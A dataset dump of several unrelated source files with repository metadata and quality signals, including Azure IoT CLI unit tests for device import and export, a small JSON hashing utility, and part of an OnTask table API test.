hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fd37e63258f7581fcf91ccc21dd12c4cfe255955
| 13,795
|
py
|
Python
|
azext_iot/tests/iothub/core/test_iot_hub_unit.py
|
lucadruda/azure-iot-cli-extension
|
9d2f677d19580f8fbac860e079550167e743a237
|
[
"MIT"
] | 79
|
2017-09-25T19:29:17.000Z
|
2022-03-30T20:55:57.000Z
|
azext_iot/tests/iothub/core/test_iot_hub_unit.py
|
lucadruda/azure-iot-cli-extension
|
9d2f677d19580f8fbac860e079550167e743a237
|
[
"MIT"
] | 305
|
2018-01-17T01:12:10.000Z
|
2022-03-23T22:38:11.000Z
|
azext_iot/tests/iothub/core/test_iot_hub_unit.py
|
lucadruda/azure-iot-cli-extension
|
9d2f677d19580f8fbac860e079550167e743a237
|
[
"MIT"
] | 69
|
2017-11-14T00:30:46.000Z
|
2022-03-01T17:11:45.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import re
import pytest
import responses
import json
from knack.cli import CLIError
from azext_iot.operations import hub as subject
from azext_iot.tests.generators import generate_generic_id
from azext_iot.common.utility import ensure_iothub_sdk_min_version
from azext_iot.constants import IOTHUB_TRACK_2_SDK_MIN_VERSION
hub_name = "HUBNAME"
blob_container_uri = "https://example.com"
resource_group_name = "RESOURCEGROUP"
managed_identity = "EXAMPLEMANAGEDIDENTITY"
generic_job_response = {"JobResponse": generate_generic_id()}
qualified_hostname = "{}.subdomain.domain".format(hub_name)
@pytest.fixture
def get_mgmt_client(mocker, fixture_cmd):
from azure.mgmt.iothub import IotHubClient
# discovery call to find iothub
patch_discovery = mocker.patch(
"azext_iot.iothub.providers.discovery.IotHubDiscovery.get_target"
)
patch_discovery.return_value = {
"resourcegroup": resource_group_name
}
# raw token for login credentials
patched_get_raw_token = mocker.patch(
"azure.cli.core._profile.Profile.get_raw_token"
)
patched_get_raw_token.return_value = (
mocker.MagicMock(name="creds"),
mocker.MagicMock(name="subscription"),
mocker.MagicMock(name="tenant"),
)
patched_get_login_credentials = mocker.patch(
"azure.cli.core._profile.Profile.get_login_credentials"
)
patched_get_login_credentials.return_value = (
mocker.MagicMock(name="subscription"),
mocker.MagicMock(name="tenant"),
)
patch = mocker.patch(
"azext_iot._factory.iot_hub_service_factory"
)
# pylint: disable=no-value-for-parameter, unexpected-keyword-arg
if ensure_iothub_sdk_min_version(IOTHUB_TRACK_2_SDK_MIN_VERSION):
patch.return_value = IotHubClient(
credential='',
subscription_id="00000000-0000-0000-0000-000000000000",
).iot_hub_resource
else:
patch.return_value = IotHubClient(
credentials='',
subscription_id="00000000-0000-0000-0000-000000000000",
).iot_hub_resource
return patch
def generate_device_identity(include_keys=False, auth_type=None, identity=None, rg=None):
return {
"include_keys": include_keys,
"storage_authentication_type": auth_type,
"identity": identity,
"resource_group_name": rg
}
def assert_device_identity_result(actual, expected):
# the body from the call will be put into additional_properties
assert actual.job_id is None
assert actual.start_time_utc is None
assert actual.end_time_utc is None
assert actual.type is None
assert actual.status is None
assert actual.failure_reason is None
assert actual.status_message is None
assert actual.parent_job_id is None
assert actual.additional_properties == expected
class TestIoTHubDeviceIdentityExport(object):
@pytest.fixture
def service_client(self, mocked_response, get_mgmt_client):
mocked_response.assert_all_requests_are_fired = False
mocked_response.add(
method=responses.GET,
content_type="application/json",
url=re.compile(
"https://(.*)management.azure.com/subscriptions/(.*)/"
"providers/Microsoft.Devices/IotHubs"
),
status=200,
match_querystring=False,
body=json.dumps({"hostName": qualified_hostname}),
)
mocked_response.add(
method=responses.POST,
url=re.compile(
"https://management.azure.com/subscriptions/(.*)/"
"providers/Microsoft.Devices/IotHubs/{}/exportDevices".format(
hub_name
)
),
body=json.dumps(generic_job_response),
status=200,
content_type="application/json",
match_querystring=False,
)
yield mocked_response
@pytest.mark.parametrize(
"req",
[
generate_device_identity(),
generate_device_identity(include_keys=True),
generate_device_identity(auth_type="identity"),
generate_device_identity(auth_type="key"),
generate_device_identity(rg=resource_group_name),
]
)
def test_device_identity_export_track1(self, fixture_cmd, service_client, req):
result = subject.iot_device_export(
cmd=fixture_cmd,
hub_name=hub_name,
blob_container_uri=blob_container_uri,
include_keys=req["include_keys"],
storage_authentication_type=req["storage_authentication_type"],
resource_group_name=req["resource_group_name"],
)
request = service_client.calls[0].request
request_body = json.loads(request.body)
assert request_body["exportBlobContainerUri"] == blob_container_uri
assert request_body["excludeKeys"] == (not req["include_keys"])
if req["storage_authentication_type"]:
assert request_body["authenticationType"] == req["storage_authentication_type"] + "Based"
if req["storage_authentication_type"] == "identityBased" and req["identity"] not in (None, "[system]"):
assert request_body["identity"]["userAssignedIdentity"] == req["identity"]
assert_device_identity_result(result, generic_job_response)
@pytest.mark.parametrize(
"req",
[
generate_device_identity(),
generate_device_identity(include_keys=True),
generate_device_identity(auth_type="identity"),
generate_device_identity(auth_type="key"),
generate_device_identity(rg=resource_group_name),
generate_device_identity(auth_type="identity", identity="[system]"),
generate_device_identity(auth_type="identity", identity="system"),
generate_device_identity(auth_type="identity", identity="managed_identity"),
]
)
@pytest.mark.skipif(
not ensure_iothub_sdk_min_version(IOTHUB_TRACK_2_SDK_MIN_VERSION),
reason="Skipping track 2 tests because SDK is track 1")
def test_device_identity_export_track2(self, fixture_cmd, service_client, req):
result = subject.iot_device_export(
cmd=fixture_cmd,
hub_name=hub_name,
blob_container_uri=blob_container_uri,
include_keys=req["include_keys"],
storage_authentication_type=req["storage_authentication_type"],
identity=req["identity"],
resource_group_name=req["resource_group_name"],
)
request = service_client.calls[0].request
request_body = json.loads(request.body)
assert request_body["exportBlobContainerUri"] == blob_container_uri
assert request_body["excludeKeys"] == (not req["include_keys"])
if req["storage_authentication_type"]:
assert request_body["authenticationType"] == req["storage_authentication_type"] + "Based"
if req["storage_authentication_type"] == "identityBased" and req["identity"] not in (None, "[system]"):
assert request_body["identity"]["userAssignedIdentity"] == req["identity"]
assert_device_identity_result(result, generic_job_response)
@pytest.mark.parametrize(
"req",
[
generate_device_identity(auth_type="key", identity="[system]"),
generate_device_identity(auth_type="key", identity="system"),
]
)
@pytest.mark.skipif(
not ensure_iothub_sdk_min_version(IOTHUB_TRACK_2_SDK_MIN_VERSION),
reason="Skipping track 2 tests because SDK is track 1")
def test_device_identity_export_input(self, fixture_cmd, req):
with pytest.raises(CLIError):
subject.iot_device_export(
cmd=fixture_cmd,
hub_name=hub_name,
blob_container_uri=blob_container_uri,
include_keys=req["include_keys"],
storage_authentication_type=req["storage_authentication_type"],
identity=req["identity"],
resource_group_name=req["resource_group_name"],
)
class TestIoTHubDeviceIdentityImport(object):
@pytest.fixture
def service_client(self, mocked_response, get_mgmt_client):
mocked_response.assert_all_requests_are_fired = False
mocked_response.add(
method=responses.GET,
content_type="application/json",
url=re.compile(
"https://(.*)management.azure.com/subscriptions/(.*)/"
"providers/Microsoft.Devices/IotHubs"
),
status=200,
match_querystring=False,
body=json.dumps({"hostName": qualified_hostname}),
)
mocked_response.add(
method=responses.POST,
content_type="application/json",
url=re.compile(
"https://management.azure.com/subscriptions/(.*)/"
"providers/Microsoft.Devices/IotHubs/{}/importDevices".format(
hub_name
)
),
status=200,
match_querystring=False,
body=json.dumps(generic_job_response),
)
yield mocked_response
@pytest.mark.parametrize(
"req",
[
generate_device_identity(),
generate_device_identity(auth_type="identity"),
generate_device_identity(auth_type="key"),
generate_device_identity(rg=resource_group_name),
]
)
def test_device_identity_import_track1(self, fixture_cmd, service_client, req):
result = subject.iot_device_import(
cmd=fixture_cmd,
hub_name=hub_name,
input_blob_container_uri=blob_container_uri,
output_blob_container_uri=blob_container_uri + "2",
storage_authentication_type=req["storage_authentication_type"],
resource_group_name=req["resource_group_name"],
)
request = service_client.calls[0].request
request_body = json.loads(request.body)
assert request_body["inputBlobContainerUri"] == blob_container_uri
assert request_body["outputBlobContainerUri"] == blob_container_uri + "2"
if req["storage_authentication_type"]:
assert request_body["authenticationType"] == req["storage_authentication_type"] + "Based"
if req["storage_authentication_type"] == "identityBased" and req["identity"] not in (None, "[system]"):
assert request_body["identity"]["userAssignedIdentity"] == req["identity"]
assert_device_identity_result(result, generic_job_response)
@pytest.mark.parametrize(
"req",
[
generate_device_identity(),
generate_device_identity(auth_type="identity"),
generate_device_identity(auth_type="key"),
generate_device_identity(rg=resource_group_name),
generate_device_identity(auth_type="identity", identity="[system]"),
generate_device_identity(auth_type="identity", identity="managed_identity"),
]
)
@pytest.mark.skipif(
not ensure_iothub_sdk_min_version(IOTHUB_TRACK_2_SDK_MIN_VERSION),
reason="Skipping track 2 tests because SDK is track 1")
def test_device_identity_import_track2(self, fixture_cmd, service_client, req):
result = subject.iot_device_import(
cmd=fixture_cmd,
hub_name=hub_name,
input_blob_container_uri=blob_container_uri,
output_blob_container_uri=blob_container_uri + "2",
storage_authentication_type=req["storage_authentication_type"],
identity=req["identity"],
resource_group_name=req["resource_group_name"],
)
request = service_client.calls[0].request
request_body = json.loads(request.body)
assert request_body["inputBlobContainerUri"] == blob_container_uri
assert request_body["outputBlobContainerUri"] == blob_container_uri + "2"
if req["storage_authentication_type"]:
assert request_body["authenticationType"] == req["storage_authentication_type"] + "Based"
if req["storage_authentication_type"] == "identityBased" and req["identity"] not in (None, "[system]"):
assert request_body["identity"]["userAssignedIdentity"] == req["identity"]
assert_device_identity_result(result, generic_job_response)
@pytest.mark.parametrize(
"req",
[
generate_device_identity(auth_type="key", identity="[system]"),
generate_device_identity(auth_type="key", identity="managed_identity"),
]
)
@pytest.mark.skipif(
not ensure_iothub_sdk_min_version(IOTHUB_TRACK_2_SDK_MIN_VERSION),
reason="Skipping track 2 tests because SDK is track 1")
def test_device_identity_import_input(self, fixture_cmd, req):
with pytest.raises(CLIError):
subject.iot_device_import(
cmd=fixture_cmd,
hub_name=hub_name,
input_blob_container_uri=blob_container_uri,
output_blob_container_uri=blob_container_uri + "2",
storage_authentication_type=req["storage_authentication_type"],
identity=req["identity"],
resource_group_name=req["resource_group_name"],
)
| 40.336257
| 111
| 0.653063
| 1,463
| 13,795
| 5.81203
| 0.142857
| 0.064213
| 0.072445
| 0.059273
| 0.809126
| 0.786193
| 0.7662
| 0.7662
| 0.737857
| 0.737857
| 0
| 0.009893
| 0.237985
| 13,795
| 341
| 112
| 40.454545
| 0.798992
| 0.038855
| 0
| 0.645051
| 0
| 0
| 0.190731
| 0.084082
| 0
| 0
| 0
| 0
| 0.109215
| 1
| 0.037543
| false
| 0
| 0.061433
| 0.003413
| 0.112628
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
fd585de17660ec6b8b50f7a557be2e279a20db4d
| 67
|
py
|
Python
|
codes/blocks/sand.py
|
shenjackyuanjie/Minecraft
|
964e65ec30098eba56c481faa78a5c11dbe5bcbb
|
[
"MIT"
] | 2
|
2020-10-15T12:44:11.000Z
|
2022-02-27T12:06:43.000Z
|
codes/blocks/sand.py
|
shenjackyuanjie/Minecraft_PE
|
964e65ec30098eba56c481faa78a5c11dbe5bcbb
|
[
"MIT"
] | null | null | null |
codes/blocks/sand.py
|
shenjackyuanjie/Minecraft_PE
|
964e65ec30098eba56c481faa78a5c11dbe5bcbb
|
[
"MIT"
] | null | null | null |
def ben_update():
return
def ben_random_tick():
return
| 7.444444
| 22
| 0.641791
| 9
| 67
| 4.444444
| 0.666667
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.268657
| 67
| 8
| 23
| 8.375
| 0.816327
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
|
0
| 6
|
b5d09508710930926876c1889db821e78bfa9ffa
| 66
|
py
|
Python
|
yetl/metaconf/_dataset.py
|
semanticinsight/yetl-framework
|
c9cf5b686cc3cb701c49e9e2a11a7bba1ecd6e73
|
[
"MIT"
] | null | null | null |
yetl/metaconf/_dataset.py
|
semanticinsight/yetl-framework
|
c9cf5b686cc3cb701c49e9e2a11a7bba1ecd6e73
|
[
"MIT"
] | null | null | null |
yetl/metaconf/_dataset.py
|
semanticinsight/yetl-framework
|
c9cf5b686cc3cb701c49e9e2a11a7bba1ecd6e73
|
[
"MIT"
] | null | null | null |
from abc import ABC, abstractmethod
class DataSet(ABC):
pass
| 13.2
| 35
| 0.742424
| 9
| 66
| 5.444444
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.19697
| 66
| 4
| 36
| 16.5
| 0.924528
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
bd2f7e05e5f90d6af20a97b4725e51f03c0520ea
| 2,151
|
py
|
Python
|
modules/hasher.py
|
jpolgesek/zseilplan-python
|
2eba0a676c43680523ef155afcd6979746bf00a0
|
[
"BSD-3-Clause"
] | 3
|
2019-07-04T05:00:30.000Z
|
2020-02-09T14:20:36.000Z
|
modules/hasher.py
|
jpolgesek/zseilplan-python
|
2eba0a676c43680523ef155afcd6979746bf00a0
|
[
"BSD-3-Clause"
] | null | null | null |
modules/hasher.py
|
jpolgesek/zseilplan-python
|
2eba0a676c43680523ef155afcd6979746bf00a0
|
[
"BSD-3-Clause"
] | null | null | null |
#coding: utf-8
import hashlib
import json
def hash_output(output):
output = json.loads(output)
hash_input = ""
hash_input += output["_updateDate_min"] + "," + output["_updateDate_max"]
hash_input += json.dumps(output['timetable'], sort_keys=True) #Fails reindexing
#hash_input += json.dumps(output['teachers'], sort_keys=True) #Fails reindexing
hash_input += json.dumps(output['units'], sort_keys=True)
hash_input += json.dumps(output['classrooms'], sort_keys=True)
hash_input += json.dumps(output['teachermap'], sort_keys=True)
hash_input += json.dumps(output['timesteps'], sort_keys=True)
hash_object = hashlib.sha256(hash_input.encode("UTF-8"))
hex_dig = hash_object.hexdigest()
return str(hex_dig)
def hash_test(output):
output = json.loads(output)
hash_input = output["_updateDate_min"] + "," + output["_updateDate_max"]
hash_object = hashlib.sha256(hash_input.encode("UTF-8"))
hex_dig = hash_object.hexdigest()
print("A: {}".format(hex_dig))
hash_input = json.dumps(output['timetable'], sort_keys=True) #Fails reindexing
hash_object = hashlib.sha256(hash_input.encode("UTF-8"))
hex_dig = hash_object.hexdigest()
print("B: {}".format(hex_dig))
hash_input = json.dumps(output['teachers'], sort_keys=True) #Fails reindexing
hash_object = hashlib.sha256(hash_input.encode("UTF-8"))
hex_dig = hash_object.hexdigest()
print("C: {}".format(hex_dig))
hash_input = json.dumps(output['units'], sort_keys=True)
hash_object = hashlib.sha256(hash_input.encode("UTF-8"))
hex_dig = hash_object.hexdigest()
print("D: {}".format(hex_dig))
hash_input = json.dumps(output['classrooms'], sort_keys=True)
hash_object = hashlib.sha256(hash_input.encode("UTF-8"))
hex_dig = hash_object.hexdigest()
print("E: {}".format(hex_dig))
hash_input = json.dumps(output['teachermap'], sort_keys=True)
hash_object = hashlib.sha256(hash_input.encode("UTF-8"))
hex_dig = hash_object.hexdigest()
print("F: {}".format(hex_dig))
hash_input = json.dumps(output['timesteps'], sort_keys=True)
hash_object = hashlib.sha256(hash_input.encode("UTF-8"))
hex_dig = hash_object.hexdigest()
print("G: {}".format(hex_dig))
return str(hex_dig)
| 40.584906
| 81
| 0.733612
| 312
| 2,151
| 4.807692
| 0.141026
| 0.138
| 0.093333
| 0.144
| 0.929333
| 0.929333
| 0.929333
| 0.887333
| 0.839333
| 0.776667
| 0
| 0.016975
| 0.096234
| 2,151
| 52
| 82
| 41.365385
| 0.75463
| 0.064621
| 0
| 0.444444
| 0
| 0
| 0.115155
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044444
| false
| 0
| 0.044444
| 0
| 0.133333
| 0.155556
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
bd38b1c45eb1f43e3334dd4513b41f25a7db5603
| 76
|
py
|
Python
|
Lib/test/test_compiler/testcorpus/02_expr_rel.py
|
diogommartins/cinder
|
79103e9119cbecef3b085ccf2878f00c26e1d175
|
[
"CNRI-Python-GPL-Compatible"
] | 1,886
|
2021-05-03T23:58:43.000Z
|
2022-03-31T19:15:58.000Z
|
Lib/test/test_compiler/testcorpus/02_expr_rel.py
|
diogommartins/cinder
|
79103e9119cbecef3b085ccf2878f00c26e1d175
|
[
"CNRI-Python-GPL-Compatible"
] | 70
|
2021-05-04T23:25:35.000Z
|
2022-03-31T18:42:08.000Z
|
Lib/test/test_compiler/testcorpus/02_expr_rel.py
|
diogommartins/cinder
|
79103e9119cbecef3b085ccf2878f00c26e1d175
|
[
"CNRI-Python-GPL-Compatible"
] | 52
|
2021-05-04T21:26:03.000Z
|
2022-03-08T18:02:56.000Z
|
a == b
a != b
a < b
a <= b
a > b
a >= b
a is b
a is not b
a in b
a not in b
| 6.909091
| 10
| 0.447368
| 26
| 76
| 1.307692
| 0.192308
| 0.529412
| 0.529412
| 0.588235
| 0.382353
| 0.382353
| 0.382353
| 0.382353
| 0.382353
| 0.382353
| 0
| 0
| 0.421053
| 76
| 10
| 11
| 7.6
| 0.772727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1fc39d420921f9339fa61250b477756869835bb3
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/debugpy/server/cli.py
|
Retraces/UkraineBot
|
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/debugpy/server/cli.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/debugpy/server/cli.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/0d/b7/81/5c68cfa376ed839e62234334494717ed2c089d359041fd5596c5144b97
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.489583
| 0
| 96
| 1
| 96
| 96
| 0.40625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
9516803a4182a158de5fae2cdea3c8e724eee522
| 23,617
|
py
|
Python
|
ontask/table/tests/test_api.py
|
pinheiroo27/ontask_b
|
23fee8caf4e1c5694a710a77f3004ca5d9effeac
|
[
"MIT"
] | 33
|
2017-12-02T04:09:24.000Z
|
2021-11-07T08:41:57.000Z
|
ontask/table/tests/test_api.py
|
pinheiroo27/ontask_b
|
23fee8caf4e1c5694a710a77f3004ca5d9effeac
|
[
"MIT"
] | 189
|
2017-11-16T04:06:29.000Z
|
2022-03-11T23:35:59.000Z
|
ontask/table/tests/test_api.py
|
pinheiroo27/ontask_b
|
23fee8caf4e1c5694a710a77f3004ca5d9effeac
|
[
"MIT"
] | 30
|
2017-11-30T03:35:44.000Z
|
2022-01-31T03:08:08.000Z
|
# -*- coding: utf-8 -*-
"""Test the table API.s"""
import os
from django.conf import settings
from django.contrib.auth import get_user_model
from django.shortcuts import reverse
import pandas as pd
from rest_framework import status
from rest_framework.authtoken.models import Token
from ontask import models, tests
from ontask.column.services import delete_column
from ontask.dataops import pandas
from ontask.table import serializers
class TableApiBase(tests.OnTaskApiTestCase):
"""Basic function and data for testing the API."""
fixtures = ['simple_table']
filename = os.path.join(settings.ONTASK_FIXTURE_DIR, 'simple_table.sql')
new_table = {
"email": ["student04@bogus.com",
"student05@bogus.com",
"student06@bogus.com"
],
"sid": [4, 5, 6],
"age": [122.0, 122.1, 132.2],
"another": ["bbbb", "aaab", "bbbb"],
"name": ["Felipe Lotas", "Aitor Tilla", "Carmelo Coton"],
"one": ["aaaa", "bbbb", "aaaa"],
"registered": [True, False, True],
"when": ["2017-10-12T00:33:44+11:00",
"2017-10-12T00:32:44+11:00",
"2017-10-12T00:32:44+11:00"
]
}
incorrect_table_1 = {
"email": {
"0": "student1@bogus.com",
"1": "student2@bogus.com",
"2": "student3@bogus.com",
"3": "student1@bogus.com"
},
"Another column": {
"0": 6.93333333333333,
"1": 9.1,
"2": 9.1,
"3": 5.03333333333333
},
"Quiz": {
"0": 1,
"1": 0,
"2": 3,
"3": 0
}
}
src_df = {
"sid": [1, 2, 4],
"newcol": ['v1', 'v2', 'v3']
}
src_df2 = {
"sid": [5],
"forcenas": ['value']
}
user_name = 'instructor01@bogus.com'
def setUp(self):
super().setUp()
# Get the token for authentication and set credentials in client
token = Token.objects.get(user__email=self.user_name)
self.client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
self.user = get_user_model().objects.get(email=self.user_name)
class TableApiCreate(TableApiBase):
"""Test the api to create a table."""
def test_table_JSON_get(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Get the data through the API
response = self.client.get(
reverse('table:api_ops', kwargs={'wid': workflow.id}))
# Transform the response into a data frame
r_df = pd.DataFrame(response.data['data_frame'])
r_df = pandas.detect_datetime_columns(r_df)
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
# Compare both elements
self.compare_tables(r_df, dframe)
# Getting the table attached to the workflow
def test_table_pandas_get(self):
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Get the data through the API
response = self.client.get(
reverse('table:api_pops', kwargs={'wid': workflow.id}))
# Transform the response into a data frame
r_df = serializers.string_to_df(response.data['data_frame'])
# Load the df from the db
dframe = pandas.load_table(workflow.get_data_frame_table_name())
# Compare both elements
self.compare_tables(r_df, dframe)
def test_table_try_JSON_overwrite(self):
# Upload a table and try to overwrite an existing one (should fail)
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Override the table
response = self.client.post(
reverse(
'table:api_ops',
kwargs={'wid': workflow.id}),
self.new_table,
format='json')
# Check that the right message is returned
self.assertIn(
'Post request requires workflow without a table',
response.data['detail'])
def test_table_try_pandas_overwrite(self):
# Upload a table and try to overwrite an existing one (should fail)
# Get the only workflow in the fixture
workflow = models.Workflow.objects.all()[0]
# Override the table
response = self.client.post(
reverse(
'table:api_pops',
kwargs={'wid': workflow.id}),
self.new_table,
format='json')
# Check that the right message is returned
self.assertIn(
'Post request requires workflow without a table',
response.data['detail'])
def test_table_json_create(self):
# Create a second workflow
response = self.client.post(
reverse('workflow:api_workflows'),
